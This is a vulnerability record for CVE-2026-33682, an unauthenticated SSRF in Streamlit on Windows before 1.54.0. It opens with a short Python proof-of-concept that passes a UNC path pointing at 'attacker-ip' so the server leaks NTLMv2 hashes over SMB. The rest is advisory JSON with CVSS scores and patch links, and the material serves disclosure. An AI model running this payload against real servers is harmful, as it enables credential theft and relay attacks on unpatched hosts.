CVE-2026-33682

import requests # Target Streamlit URL (Example endpoint) target_url = "http://vulnerable-streamlit-host:8501/_stcore/path" # Malicious UNC path to trigger SMB connection # Replace 'attacker-ip' with the listener's IP address malicious_path = "\\\\attacker-ip\\share\\test.txt" try: # Send request with the malicious UNC path response = requests.get( target_url, params={"path": malicious_path}, timeout=10 ) print(f"Status Code: {response.status_code}") print("Check SMB listener for NTLMv2 hash capture.") except Exception as e: print(f"Request failed: {e}")

{"cve": {"id": "CVE-2026-33682", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:30.880", "lastModified": "2026-04-01T13:28:47.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Streamlit is a data oriented application development framework for python. Streamlit Open Source versions prior to 1.54.0 running on Windows hosts have an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The vulnerability arises from improper validation of attacker-supplied filesystem paths. In certain code paths, including within the `ComponentRequestHandler`, filesystem paths are resolved using `os.path.realpath()` or `Path.resolve()` before sufficient validation occurs. On Windows systems, supplying a malicious UNC path (e.g., `\\\\attacker-controlled-host\\share`) can cause the Streamlit server to initiate outbound SMB connections over port 445. When Windows attempts to authenticate to the remote SMB server, NTLMv2 challenge-response credentials of the Windows user running the Streamlit process may be transmitted. This behavior may allow an attacker to perform NTLM relay attacks against other internal services and/or identify internally reachable SMB hosts via timing analysis. The vulnerability has been fixed in Streamlit Open Source version 1.54.0."}, {"lang": "es", "value": "Streamlit es un framework de desarrollo de aplicaciones orientado a datos para python. Las versiones de Streamlit Open Source anteriores a la 1.54.0 ejecutándose en hosts Windows tienen una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) no autenticada. La vulnerabilidad surge de una validación incorrecta de las rutas del sistema de archivos proporcionadas por el atacante. En ciertas rutas de código, incluyendo dentro del 'ComponentRequestHandler', las rutas del sistema de archivos se resuelven usando 'os.path.realpath()' o 'Path.resolve()' antes de que ocurra una validación suficiente. En sistemas Windows, proporcionar una ruta UNC maliciosa (por ejemplo, '\\\\attacker-controlled-host\\share') puede hacer que el servidor de Streamlit inicie conexiones SMB salientes a través del puerto 445. Cuando Windows intenta autenticarse con el servidor SMB remoto, las credenciales de desafío-respuesta NTLMv2 del usuario de Windows que ejecuta el proceso de Streamlit pueden ser transmitidas. Este comportamiento puede permitir a un atacante realizar ataques de retransmisión NTLM contra otros servicios internos y/o identificar hosts SMB accesibles internamente mediante análisis de tiempo. La vulnerabilidad ha sido corregida en la versión 1.54.0 de Streamlit Open Source."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:snowflake:streamlit:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.54.0", "matchCriteriaId": "497DB8B7-82E6-4AB2-8D27-4C1F333C5D24"}]}]}], "references": [{"url": "https://github.com/streamlit/streamlit/commit/23692ca70b2f2ac720c72d1feb4f190c9d6eed76", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/streamlit/streamlit/releases/tag/1.54.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/streamlit/streamlit/security/advisories/GHSA-7p48-42j8-8846", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}